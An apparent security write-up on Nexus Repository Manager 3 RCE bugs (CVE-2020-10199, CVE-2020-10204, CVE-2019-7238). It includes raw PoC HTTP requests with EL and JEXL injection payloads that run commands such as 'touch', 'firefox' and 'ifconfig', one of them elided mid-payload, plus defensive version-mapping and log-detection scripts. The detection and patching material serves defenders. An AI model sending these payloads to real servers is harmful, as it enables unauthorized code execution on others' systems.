Nexus Repository Manager 3 is a repository manager used to store and distribute Maven, NuGet and other package repositories. Versions 3.21.1 and earlier contain an arbitrary EL expression injection vulnerability; it is a bypass of the fix for CVE-2018-16621.

CVE-2020-10199: Nexus Repository Manager OSS/Pro <= 3.21.1, requires a low-privileged account.
CVE-2020-10204: Nexus Repository Manager OSS/Pro <= 3.21.1, requires an administrator account.
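The three CVEs covered here have overlapping affected ranges, so the first thing a defender wants is a quick way to map a deployed version to the advisories that apply. The following is an added example written for this post, not Sonatype's code: the ranges are exactly the ones stated on this page (3.6.2 through 3.14.0 for CVE-2019-7238, everything up to 3.21.1 for the two EL injection CVEs), while the `Server` header format is an assumption about what a Nexus 3 instance commonly returns and should be confirmed against your own deployment.

```python
"""Map a Nexus Repository Manager 3 version string to the CVEs listed above.

Added example, not Sonatype's code.  The affected ranges are the ones stated
on this page; the Server-header format is an assumption about what a Nexus 3
instance commonly sends and should be checked against your own deployment.
"""
import re
from typing import Dict, List, Optional, Tuple

Version = Tuple[int, int, int]

# (lowest affected version, or None for "all earlier"; highest affected version), inclusive.
AFFECTED: Dict[str, Tuple[Optional[Version], Version]] = {
    "CVE-2019-7238": ((3, 6, 2), (3, 14, 0)),   # unauthenticated JEXL RCE
    "CVE-2020-10199": (None, (3, 21, 1)),       # EL injection, low-privileged account
    "CVE-2020-10204": (None, (3, 21, 1)),       # EL injection, administrator account
}


def parse_version(version: str) -> Version:
    """Turn '3.21.1-01' (or plain '3.21.1') into (3, 21, 1); the '-01' build number is ignored."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised Nexus version string: {version!r}")
    major, minor, patch = (int(p) for p in m.groups())
    return (major, minor, patch)


def version_from_server_header(header: str) -> Optional[str]:
    """Pull the version out of a 'Nexus/3.21.1-01 (OSS)' style Server header value (assumed format)."""
    m = re.search(r"Nexus/(\d+\.\d+\.\d+(?:-\d+)?)", header)
    return m.group(1) if m else None


def applicable_cves(version: str) -> List[str]:
    """Return the CVE ids whose affected range contains this version, sorted."""
    v = parse_version(version)
    hits = [
        cve for cve, (low, high) in AFFECTED.items()
        if (low is None or low <= v) and v <= high
    ]
    return sorted(hits)


if __name__ == "__main__":
    # Constructed samples; the first is the version the PoC's Referer reveals (_v=3.21.1-01).
    for sample in ("3.21.1-01", "3.10.0-04", "3.22.0-02"):
        print(sample, "->", applicable_cves(sample) or "not in any listed range")
```

The version string also appears in the swagger-ui Referer of the request below (`_v=3.21.1-01`), so the same parser works on either source.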

CVE-2020-10204

Log in with the weak default credentials admin/admin.

PoC

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: xxx:46660
Content-Length: 292
accept: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.3170138167765151
Content-Type: application/json
Origin: http://192.168.83.40:46660
Referer: http://192.168.83.40:46660/swagger-ui/?_v=3.21.1-01&_e=OSS
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: vue_admin_template_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoxLCJ1c2VybmFtZSI6ImFkbWluIiwiZXhwIjoxNTg4MDUwODM0LCJlbWFpbCI6ImFkbWluQGJhaW1hb2h1aS5uZXQifQ.oxM4vBBagsMl1R1Nf-YNdeKI4fKUiCQY4PPZ9UR6OrE; NX-ANTI-CSRF-TOKEN=0.3170138167765151; _ga=GA1.4.1188408586.1587980353; _gid=GA1.4.198747155.1587980353; NXSESSIONID=c2ba012e-c120-4a7d-882c-dbdddf31779b
Connection: close

{
"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"]}
}

CVE-2020-11444: authorization bypass

Unauthenticated RCE: CVE-2019-7238
Affected range
Nexus Repository Manager OSS/Pro 3.6.2 through 3.14.0
Prerequisites for triggering
The Maven repository must contain at least one package; if it contains none, log in and upload an arbitrary package first.

Payload without output (blind)

POST /service/extdirect HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 397
Connection: close

{"type": "rpc", "method": "previewAssets", "tid": 18, "data": [{"limit": 50, "sort": [{"property": "name", "direction": "ASC"}], "page": 1, "filter": [{"value": "*", "property": "repositoryName"}, {"value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"firefox\")", "property": "expression"}, {"value": "jexl", "property": "type"}], "start": 0}], "action": "coreui_Component"}

Payload with output

POST /service/extdirect HTTP/1.1
Host: ip:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: */*
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 7249
Connection: close

{"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){   c=1.class.forName('java.lang.Character');   integer=1.class;   x…y=0;   z='';   while (y lt x.length()){       z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0];       y += 2;   };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n    y,\n   'Exploit.Test234',\n    z.getBytes('latin1'),    0,\n    3054\n);x.getMethod('test', ''.class).invoke(null, 'ifconfig');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
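Both request shapes on this page are easy to recognise on the wire: the EL injection CVEs ride on the repository REST API with an expression marker (`${` or the `$\A{` form that slipped past the CVE-2018-16621 filter) inside a JSON string, and CVE-2019-7238 is an Ext.Direct `previewAssets` call whose `type` filter is `jexl` and whose `expression` reaches into Java reflection (`.class.forName`, `getRuntime()`, `defineClass`). The script below is an added example for detection, not code from this post or from Sonatype. It assumes the POST bodies are available from a reverse proxy or WAF log, since Nexus's own request.log does not record bodies; the sample records are constructed from the payloads above plus two legitimate requests to show what is not flagged.

```python
"""Flag the two Nexus RCE request shapes shown on this page in logged POST bodies.

Added example, not Sonatype's code.  Assumes a reverse proxy or WAF that logs
request bodies (Nexus's request.log does not); the sample records are constructed.
"""
import json
import re
from typing import Any, Dict, Iterator, List, Tuple

# EL markers: "${", "#{" and the "$\A{" form that bypassed the CVE-2018-16621 filter.
EL_MARKER = re.compile(r"\$\\?A?\{|#\{")
# Java reflection / process-spawning tokens seen in the JEXL payloads above.
REFLECTION = re.compile(r"\.forName\(|getRuntime\(\)|\.exec\(|defineClass|getDeclaredMethod", re.I)


def _strings(node: Any) -> Iterator[str]:
    """Walk a decoded JSON value and yield every string leaf."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        for v in node.values():
            yield from _strings(v)
    elif isinstance(node, list):
        for v in node:
            yield from _strings(v)


def _extdirect_filters(body: dict) -> Dict[str, Any]:
    """Collect property -> value from an Ext.Direct call's data[].filter[] entries."""
    out: Dict[str, Any] = {}
    for d in body.get("data") or []:
        if isinstance(d, dict):
            for f in d.get("filter") or []:
                if isinstance(f, dict) and "property" in f:
                    out[f["property"]] = f.get("value")
    return out


def inspect_request(method: str, path: str, raw_body: str) -> List[str]:
    """Return finding labels for one logged request; an empty list means nothing seen."""
    findings: List[str] = []
    if method.upper() != "POST":
        return findings
    try:
        body = json.loads(raw_body)
    except ValueError:
        return findings
    if not isinstance(body, dict):
        return findings

    # Shape 1: repository create/update on the REST API with an EL marker in any string field.
    if path.startswith("/service/rest/") and "/repositories/" in path:
        if any(EL_MARKER.search(s) for s in _strings(body)):
            findings.append("CVE-2020-10199/10204: EL marker in repository API request")

    # Shape 2: Ext.Direct previewAssets with a JEXL expression that reaches into Java.
    if path == "/service/extdirect" and body.get("method") == "previewAssets":
        filters = _extdirect_filters(body)
        expr = filters.get("expression") or ""
        if filters.get("type") == "jexl" and isinstance(expr, str) and REFLECTION.search(expr):
            findings.append("CVE-2019-7238: reflective JEXL expression in previewAssets")
    return findings


def scan(records: List[Tuple[str, str, str]]) -> Dict[int, List[str]]:
    """Run inspect_request over (method, path, body) records; return {record index: findings}."""
    return {i: f for i, (m, p, b) in enumerate(records) if (f := inspect_request(m, p, b))}


# Constructed sample records: the two PoC bodies from this page, then two benign requests.
SAMPLE_REQUESTS: List[Tuple[str, str, str]] = [
    ("POST", "/service/rest/beta/repositories/go/group", json.dumps({
        "name": "internal", "online": True,
        "storage": {"blobStoreName": "default", "strictContentTypeValidation": True},
        "group": {"memberNames": [
            "$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}"
        ]},
    })),
    ("POST", "/service/extdirect", json.dumps({
        "type": "rpc", "method": "previewAssets", "tid": 18, "action": "coreui_Component",
        "data": [{"limit": 50, "page": 1, "start": 0,
                  "sort": [{"property": "name", "direction": "ASC"}],
                  "filter": [{"property": "repositoryName", "value": "*"},
                             {"property": "expression",
                              "value": "1==0 or ''.class.forName('java.lang.Runtime').getRuntime().exec(\"firefox\")"},
                             {"property": "type", "value": "jexl"}]}],
    })),
    ("POST", "/service/rest/beta/repositories/maven/group", json.dumps({
        "name": "maven-public", "online": True,
        "storage": {"blobStoreName": "default", "strictContentTypeValidation": True},
        "group": {"memberNames": ["maven-releases", "maven-central"]},
    })),
    ("POST", "/service/extdirect", json.dumps({
        "type": "rpc", "method": "previewAssets", "tid": 3, "action": "coreui_Component",
        "data": [{"limit": 50, "page": 1, "start": 0,
                  "filter": [{"property": "repositoryName", "value": "*"},
                             {"property": "expression", "value": "format == 'maven2'"},
                             {"property": "type", "value": "jexl"}]}],
    })),
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_REQUESTS).items():
        print(f"record {idx}: {'; '.join(labels)}")
```

The reflection token list is deliberately narrow so that ordinary JEXL content selectors (the fourth sample) pass; widen it only with tokens you have seen in your own traffic, and treat any match on a pre-3.15 instance as a patching trigger rather than just an alert.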
